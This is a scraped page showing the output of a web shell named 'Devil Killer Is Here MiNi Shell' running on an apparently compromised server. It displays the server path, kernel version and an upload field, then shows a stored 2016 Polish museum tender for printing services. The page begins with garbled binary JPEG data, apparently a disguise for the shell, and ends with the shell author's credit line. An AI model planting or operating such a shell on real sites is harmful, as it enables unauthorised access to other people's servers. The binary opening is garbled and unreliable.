JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160629/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160629/109411-N-2016.html

<p class="kh_header"><b>Białystok: Usługa poligraficzna II w roku 2016</b><br>
<b>Numer ogłoszenia: 109411 - 2016; data zamieszczenia: 29.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Podlaskie w Białymstoku , ul. Ratusz-Rynek Kościuszki 10, 15-426 Białystok, woj. podlaskie, tel. 085 7421473, 7421440.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.muzeum.bialystok.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa poligraficzna II w roku 2016.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia 
Usługa poligraficzna przygotowanie projektu, korekta tonalna fotografii, czyszczenie fotografii, skład i druk wydawnictw, adiustacja tekstu w języku polskim sprawdzenie pod względem językowym i gramatycznym wraz z dostawą dla Muzeum Podlaskiego w Białymstoku w roku 2016. W przypadku tekstu w języku angielskim - korektę wykonuje Muzeum. Do części wydawnictw co jest zaznaczone w wykazie dostarczone będą projekty i usługa poligraficzna obejmie tylko druk tych wydawnictw. 

2.Szczegółowy opis przedmiotu zamówienia:  

CZĘŚĆ I zamówienia.  
Usługa poligraficzna przygotowanie projektu, korekta tonalna fotografii, czyszczenie fotografii, adiustacja tekstu w języku polskim sprawdzenie pod względem językowym i gramatycznym, skład i druk albumów, książek i zeszytów edukacyjnych wraz z dostawą dla Muzeum Podlaskiego w Białymstoku w roku 2016.

1. Album
Katalog mebli stylowych ze zbiorów Muzeum Podlaskiego w Białymstoku, format 300 na 270 mm pion, środek obj. 120 str. +/- 10%, kreda mat. 150g, kolor 4+4, oprawa twarda szyta nićmi, oklejka 130g, kolor 4+0+folia matowa, wyklejka biała niezadrukowana 130g, nakład 1000 egz., 
wydawnictwo posiada Nr ISBN 
Muzeum dostarczy gotowy projekt
Termin przekazania materiałów do 20.10.2016
Termin druku do 20.11.2016

2. Album
Szesnastowieczne freski supraskie. Katalog zbiorów, format 300 na 270 mm pion, środek, objętość ok. 300 str. +/- 10%, kreda mat. 150 g, kolor 4+4, oprawa twarda, szyta, kolor 4+0+folia matowa+lakier punktowo, wyklejka biała niezadrukowana 130 g, nakład 1000 egz., 
wydawnictwo posiada Nr ISBN, 
Muzeum dostarczy layout wydawnictwa
Termin przekazania materiałów do 19.08.2016
Termin druku do 30.09.2016

3. Album
Katalog malarstwa polskiego z kolekcji Macieja Tomaszewskiego, format A4, środek obj. 100 str. +/- 10%, kreda mat. 150g, kolor 4+4, oprawa miękka, klejona, karton 300 g,  kolor 4+0+folia matowa, nakład 300 egz., 
wydawnictwo posiada Nr ISBN 
Muzeum dostarczy gotowy projekt
Termin przekazania materiałów do 25.08.2016
Termin druku do 15.09.2016

4. Książka
Katalog do wystawy My Żydzi przybyliśmy do Tykocina przed wiekami, format B5 170 na 240 mm, poziom, środek obj. 20 str., kreda mat. 135 g,  kolor 4+4, oprawa miękka, okładka kreda 300 g, kolor 4+0+folia matowa, szycie zeszytowe, nakład og. 1.000 egz. 500 szt. w jęz. polskim, 500 szt. w jęz. angielskim, wydawnictwo posiada nr ISBN
Termin przekazania materiałów do 20.07.2016
Termin druku do 15.09.2016

5. Zeszyt edukacyjny
Zeszyt edukacyjny nt. Galerii Malarstwa Polskiego, format A4, środek 32 strony, papier offset 120 g, kolor 4+4, okładka karton 200 g., kolor 4+4+folia błyszcząca, szycie zeszytowe, wkładki: 2 razy format A4, papier samoprzylepny mat. 80 g, sztancowany 43 nieregularne wizerunki rozmieszczone na dwóch kartach A4, kolor 4+0, nakład 1.000 szt.,
wydawnictwo posiada nr ISBN 
Muzeum dostarczy gotowy projekt 
Termin przekazania materiałów do 15.09.2016
Termin druku do 30.09.2016

6.Książka
Rocznik Białostocki tom 20. Format bloku 240 na 165 mm, środek 240 strony  +/- 8 % kreda mat. 135 g kolor 4+4 na 40 stronach w 8 miejscach tekstu reszta stron druk 1+1. oprawa twarda szyta nićmi, okładka druk 2 + 0 dwa kolory Pantone + folia matowa, wyklejki niezadrukowane offset 150 g. , nakład: 500 szt. 
wydawnictwo posiada Nr ISSN
Termin przekazania materiałów do 01.08.2016
Termin druku do 31.10.2016


CZĘŚĆ II zamówienia.  
Usługa poligraficzna: przygotowanie projektu, korekta tonalna fotografii, czyszczenie fotografii, adiustacja tekstu w języku polskim sprawdzenie pod względem językowym i gramatycznym, skład i druk folderów, reprodukcji, zaproszeń, biletów wstępu, papieru firmowego wraz z dostawą dla Muzeum Podlaskiego w Białymstoku w roku 2016.

1.Folder
Folder  A. Jaraszajtis - fotograf Bielska Podlaskiego i Wilna, format 29,6 na 58,6 cm składany na 4, 3 bigowania, kreda mat. 200 g, kolor 4 + 4+lakier offsetowy, nakład 500 egz.   wersja polsko- litewsko- angielska
Termin przekazania materiałów do 15.11.2016
Termin druku do 12.12.2016

2.Reprodukcja
Reprodukcja do warsztatów z techniki tempery jajowej: format A5, papier offset 80 g; kolor 1+0,  nakład 1000 szt.
Termin przekazania materiałów do 1.08.2016
Termin druku do 15.08.2016

3.Zaproszenie
zaproszenie, format A4 składane na 3, 2 bigi, papier offset 200g, kolor 4+0, nakład og. 7.000 szt. 6 wzorów w tym: 5 wzorów po 1000 szt.,  1 wzór - 2000 szt.
Muzeum dostarczy gotowy projekt  
Termin przekazania materiałów do 1.09.2016
Termin druku do 15.09.2016

4.Bilety wstępu
bilety wstępu, format 4 na 14 cm, papier 80g, kolor 1panton +1czarny, klejone w bloczkach po 100 szt. nakład og. 18.000 szt. 6 wzorów po 3000 szt. każdy
Muzeum dostarczy gotowy projekt 
Termin przekazania materiałów do 1.09.2016
Termin druku do 15.09.2016

5.Papier firmowy
Papier firmowy, format A4, papier ecru 80 g, kolor 2+0, nakład 1000 szt. 
Muzeum dostarczy gotowy projekt 
Termin przekazania materiałów do 1.09.2016
Termin druku do 15.09.2016
3.Symbol według Wspólnego Słownika Zamówień 
CPV 79800000-2 	Usługi drukowania i powiązane 
CPV 22000000-0 	Druki i produkty podobne
CPV 79820000-8 	Usługi związane z drukowaniem 
CPV 79823000-9 	Usługi drukowania i dostawy
4.	Zamawiający  dopuszcza składania ofert częściowych Wykonawca może złożyć ofertę na jedną lub dwie części:
a)I część przedmiotu zamówienia: Druk albumów, książek i zeszytów edukacyjnych
b)II część przedmiotu zamówienia: Druk folderów, reprodukcji, zaproszeń, biletów wstępu, papieru firmowego
5.Zamawiający nie przewiduje zamówień uzupełniających.
6.Zamawiający nie dopuszcza składania ofert wariantowych.  
7.Zamawiający nie przewiduje aukcji elektronicznej.  
8.Wykonawca zobowiązany jest każdorazowa przedstawić Zamawiającemu do akceptacji projekt graficzny i skład komputerowy wykonywanego zamówienia w formie elektronicznej.  
9.Wykonawca zobowiązany będzie na żądanie Zamawiającego przedstawić wydruki próbne i dostarczać je do ostatecznej korekty i akceptacji do siedziby Zamawiającego przed zrealizowaniem danego zamówienia.  
10.Przedstawicielem Zamawiającego w zakresie uzgodnień technicznych, w tym akceptacji wydruków próbnych jest pani Barbara Muszyńska  - Kierownik Działu Promocji Wystaw i Wydawnictw Muzeum Podlaskiego w Białymstoku tel. 085 740-77-41 , 509-337-095
11.Wykonawca zobowiązany będzie do wykonania każdego z elementów zamówienia w terminie uzgodnionym przez strony.
12.Wykonawca po wykonaniu poszczególnych elementów zamówienia przekazuje je Zamawiającemu tj. dostarcza na własny koszt do siedziby Zamawiającego, przekazuje Zamawiającemu majątkowe prawa autorskie do zaakceptowanych projektów oraz przekazuje projekt wydawnictwa  przedmiotu zamówienia w formie przygotowanej do druku na nośniku cyfrowym w wersji w pełni edytowalnej komplet plików źródłowych z przekazaniem pełnych praw autorskich skład, fonty czcionka
13.Zamawiający dostarczy Wykonawcy materiały tekstowe i fotograficzne w formie elektronicznej. Do części wydawnictw Zamawiający przekaże gotowe projekty, co zaznaczone jest w wykazie wydawnictw przedstawionych w opisie przedmiotu zamówienia. 
14.Zamawiający każdorazowo w formie elektronicznej poda szczegóły dotyczące wykonania poszczególnych części przedmiotu zamówienia.
15.Zamawiający zastrzega sobie prawo kontroli losowo wybranej realizowanej usługi poligraficznej w trakcie realizacji przedmiotu umowy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2, 22.00.00.00-0, 79.82.00.00-8, 79.82.30.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie opisuje tego warunku udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie opisuje tego warunku udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie opisuje tego warunku udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie opisuje tego warunku udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie opisuje tego warunku udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)Wypełniony zgodnie z treścią i podpisany formularz Oferta stanowiący Załącznik  Nr 1 A do SIWZ wraz z tabelą - Załącznik nr 1B do SIWZ
2)Zamawiający wymaga dołączenia do oferty próbek w postaci gotowych wydawnictw o parametrach podobnych do podanych w SIWZ:
- do I części zamówienia -  1 wydawnictwo (np. album, książka, informator, zeszyt edukacyjny) 
- do II części zamówienia - 2 szt. próbek  (np. folder, zaproszenie, bilet, papier firmowy lub inne wydawnictwo o równoważnych parametrach zamówienia wskazanym w specyfikacji)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Jakość - 30</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do  treści oferty, na podstawie której dokonano wyboru Wykonawcy, w zakresie: 
a)zmiany stawki podatku VAT, przy założeniu, że cena brutto ulegnie zmianie w stopniu  wynikającym ze zmiany stawki podatkowej, zaś cena netto pozostanie bez zmian, 
b)zmiany przedstawicieli stron umowy, 
c)jeżeli konieczność zmiany jest spowodowana wystąpieniem niezależnych od stron okoliczności, których nie można było przy dołożeniu należytej staranności przewidzieć w chwili zawarcia umowy, a które uniemożliwiają prawidłową realizację przedmiotu umowy zgodnie z jej postanowieniami,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.muzeum.bialystok.pl/s,zamowienia-ktorych-wartosc-przekracza-kwote-30-tys-euro,375.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Podlaskie w Białymstoku
Ratusz Rynek Kościuszki 10
15-426 Białystok
Dział Administracyjno - Gospodarczy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.07.2016 godzina 09:30, miejsce: Sekretariat Muzeum Podlaskiego w Białymstoku
Ratusz Rynek Kościuszki 10
15-426 Białystok.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Druk albumów, książek i zeszytów edukacyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa poligraficzna: przygotowanie projektu, korekta tonalna fotografii, czyszczenie fotografii, adiustacja tekstu w języku polskim (sprawdzenie pod względem językowym i gramatycznym), skład i druk albumów, książek i zeszytów edukacyjnych wraz z dostawą dla Muzeum Podlaskiego w Białymstoku w roku 2016.

1)	Album
Katalog mebli stylowych ze zbiorów Muzeum Podlaskiego w Białymstoku, format 300 x 270 mm(pion), środek obj. 120 str. (+/- 10%), kreda mat. 150g, kolor 4+4, oprawa twarda szyta nićmi, oklejka 130g, kolor 4+0+folia matowa, wyklejka biała niezadrukowana 130g, nakład 1000 egz., 
wydawnictwo posiada Nr ISBN 
Muzeum dostarczy gotowy projekt
Termin przekazania materiałów do 20.10.2016
Termin druku do 20.11.2016

2)	Album
Szesnastowieczne freski supraskie. Katalog zbiorów, format 300 x 270 mm (pion), środek, objętość ok. 300 str. (+/- 10%), kreda mat. 150 g, kolor 4+4, oprawa twarda, szyta, kolor 4+0+folia matowa+lakier punktowo, wyklejka biała niezadrukowana 130 g, nakład 1000 egz., 
wydawnictwo posiada Nr ISBN, 
Muzeum dostarczy layout wydawnictwa
Termin przekazania materiałów do 19.08.2016
Termin druku do 30.09.2016

3)	Album
Katalog malarstwa polskiego z kolekcji Macieja Tomaszewskiego, format A4, środek obj. 100 str. (+/- 10%), kreda mat. 150g, kolor 4+4, oprawa miękka, klejona, karton 300 g,  kolor 4+0+folia matowa, nakład 300 egz., 
wydawnictwo posiada Nr ISBN 
Muzeum dostarczy gotowy projekt
Termin przekazania materiałów do 25.08.2016
Termin druku do 15.09.2016

4)	Książka
Katalog do wystawy My Żydzi przybyliśmy do Tykocina przed wiekami, format B5 (170 x 240 mm), poziom, środek obj. 20 str., kreda mat. 135 g,  kolor 4+4, oprawa miękka, okładka kreda 300 g, kolor 4+0+folia matowa, szycie zeszytowe, nakład og. 1.000 egz. (500 szt. w jęz. polskim, 500 szt. w jęz. angielskim), wydawnictwo posiada nr ISBN
Termin przekazania materiałów do 20.07.2016
Termin druku do 15.09.2016

5)	Zeszyt edukacyjny
Zeszyt edukacyjny nt. Galerii Malarstwa Polskiego, format A4, środek: 32 strony, papier offset 120 g, kolor 4+4, okładka karton 200 g., kolor 4+4+folia błyszcząca, szycie zeszytowe, wkładki: 2 x format A4, papier samoprzylepny mat. 80 g, sztancowany (43 nieregularne wizerunki rozmieszczone na dwóch kartach A4), kolor 4+0, nakład 1.000 szt.,
wydawnictwo posiada nr ISBN 
Muzeum dostarczy gotowy projekt 
Termin przekazania materiałów do 15.09.2016
Termin druku do 30.09.2016

6)	Książka
Rocznik Białostocki tom XX. Format bloku 240 x 165 mm, środek 240 strony ( +/- 8 %) kreda mat. 135 g (kolor 4+4 na 40 stronach w 8 miejscach tekstu) reszta stron druk 1+1. oprawa twarda szyta nićmi, okładka druk 2 + 0 (dwa kolory Pantone) + folia matowa, wyklejki niezadrukowane offset 150 g. , nakład: 500 szt. 
wydawnictwo posiada Nr ISSN
Termin przekazania materiałów do 01.08.2016
Termin druku do 31.10.2016.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2, 22.00.00.00-0, 79.82.00.00-8, 79.82.30.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Druk folderów, reprodukcji, zaproszeń, biletów wstępu, papieru firmowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa poligraficzna: przygotowanie projektu, korekta tonalna fotografii, czyszczenie fotografii, adiustacja tekstu w języku polskim (sprawdzenie pod względem językowym i gramatycznym), skład i druk folderów, reprodukcji, zaproszeń, biletów wstępu, papieru firmowego wraz z dostawą dla Muzeum Podlaskiego w Białymstoku w roku 2016.

1)	Folder
Folder A. Jaraszajtis - fotograf Bielska Podlaskiego i Wilna, format 29,6 x 58,6 cm (składany na 4), 3 bigowania, kreda mat. 200 g, kolor 4 + 4+lakier offsetowy, nakład 500 egz.   (wersja polsko- litewsko- angielska)
Termin przekazania materiałów do 15.11.2016
Termin druku do 12.12.2016

2)	Reprodukcja
Reprodukcja do warsztatów z techniki tempery jajowej: format A5, papier offset 80 g; kolor 1+0,  nakład 1000 szt.
Termin przekazania materiałów do 1.08.2016
Termin druku do 15.08.2016

3)	Zaproszenie
zaproszenie, format A4 składane na 3, 2 bigi, papier offset 200g, kolor 4+0, nakład og. 7.000 szt. (6 wzorów w tym: 5 wzorów po 1000 szt.,  1 wzór - 2000 szt.)
Muzeum dostarczy gotowy projekt  
Termin przekazania materiałów do 1.09.2016
Termin druku do 15.09.2016

4)	Bilety wstępu
bilety wstępu, format 4 x14 cm, papier 80g, kolor 1(panton) +1(czarny), klejone w bloczkach po 100 szt. nakład og. 18.000 szt. (6 wzorów po 3000 szt. każdy)
Muzeum dostarczy gotowy projekt 
Termin przekazania materiałów do 1.09.2016
Termin druku do 15.09.2016

5)	Papier firmowy
Papier firmowy, format A4, papier ecru 80 g, kolor 2+0, nakład 1000 szt. 
Muzeum dostarczy gotowy projekt 
Termin przekazania materiałów do 1.09.2016
Termin druku do 15.09.2016.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2, 22.00.00.00-0, 79.82.00.00-8, 79.82.30.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com